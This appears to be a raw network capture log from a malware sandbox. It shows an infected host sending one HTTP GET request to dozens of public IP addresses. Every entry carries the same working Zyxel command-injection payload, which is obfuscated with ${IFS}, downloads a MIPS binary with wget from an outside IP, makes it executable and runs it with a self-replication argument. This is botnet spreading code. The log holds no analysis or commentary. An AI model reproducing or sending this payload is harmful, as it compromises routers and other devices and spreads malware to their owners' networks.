                                        Jan 14, 2024 16:18:30.120640039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        526192.168.2.134820266.163.60.56443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.120697021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        527192.168.2.1357008132.54.127.98443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.120738983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        528192.168.2.1338384145.240.141.147443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.120834112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        529192.168.2.1359210179.213.27.81443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.120908976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        530192.168.2.1359190111.167.241.80443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.121012926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        531192.168.2.1352284164.57.12.199443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.121036053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        532192.168.2.1339464166.81.147.96443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.121094942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        533192.168.2.133412820.234.177.208443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.121151924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        534192.168.2.1351124194.25.130.82443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.121226072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        535192.168.2.134769031.188.243.248443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.121229887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        536192.168.2.13459444.201.144.67443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.121279001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        537192.168.2.133555457.217.198.77443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.121339083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        538192.168.2.1359818128.89.56.81443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.121444941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        539192.168.2.135313214.217.14.125443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.121458054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        540192.168.2.134436424.121.172.38443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.121529102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        541192.168.2.1336352174.233.127.64443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.121584892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        542192.168.2.1343664142.247.95.144443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.121642113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        543192.168.2.1353536169.122.114.196443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.121695995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        544192.168.2.1350026139.208.32.143443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.121754885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        545192.168.2.1358188211.241.152.130443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.121814013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        546192.168.2.1335710150.139.93.93443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.121876001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        547192.168.2.1360920191.79.29.81443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.121934891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        548192.168.2.1344254188.112.237.98443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.121998072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        549192.168.2.1356438174.84.139.82443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.122039080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        550192.168.2.1337670171.95.84.55443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.122088909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        551192.168.2.135857087.137.51.233443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.122159958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        552192.168.2.1354156102.170.171.239443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.122224092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        553192.168.2.133990044.102.0.215443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.122262001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        554192.168.2.1342348194.28.67.167443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.122347116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        555192.168.2.1349644168.87.241.21443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.122397900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        556192.168.2.134224646.12.127.208443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.122453928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        557192.168.2.136066243.70.51.238443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.122502089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        558192.168.2.1341962160.143.217.119443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.122565985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        559192.168.2.135220257.154.160.236443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.122605085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        560192.168.2.134850260.160.136.45443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.122687101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        561192.168.2.1349222197.83.89.38443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.122724056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        562192.168.2.1350282137.123.117.141443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.122778893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        563192.168.2.13433644.211.214.215443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.122824907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        564192.168.2.1335728123.118.200.102443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.122881889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        565192.168.2.1353164175.84.211.231443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.122916937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        566192.168.2.1356426185.63.145.222443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.122966051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        567192.168.2.1350400185.134.46.52443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.122998953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        568192.168.2.135573852.225.45.219443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.123059034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        569192.168.2.1344560115.91.237.208443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.123116970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        570192.168.2.135726075.204.174.74443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.123178005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        571192.168.2.1354132213.96.177.55443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.123223066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        572192.168.2.135261291.245.159.231443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.123275995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        573192.168.2.133503657.165.200.25443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.123343945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        574192.168.2.133431835.35.64.78443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.123378038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        575192.168.2.1348500102.127.94.175443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.123445988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        576192.168.2.134094696.14.95.222443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.123498917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        577192.168.2.1357118104.200.73.130443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.123554945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        578192.168.2.1341888219.217.33.41443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.123608112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        579192.168.2.13365808.67.89.122443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.123656988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        580192.168.2.1340470152.181.188.147443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.123703957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        581192.168.2.1347854217.164.75.21443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.123769999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        582192.168.2.1358550205.52.120.179443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.123806953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        583192.168.2.1353052140.200.6.137443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.123871088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        584192.168.2.135564435.79.207.204443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.123923063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        585192.168.2.1343346205.44.70.172443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.123967886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        586192.168.2.1351146102.149.185.234443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.124022007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        587192.168.2.1348584182.149.15.91443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.124080896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        588192.168.2.1355320111.206.18.173443
                                        TimestampBytes transferredDirectionData
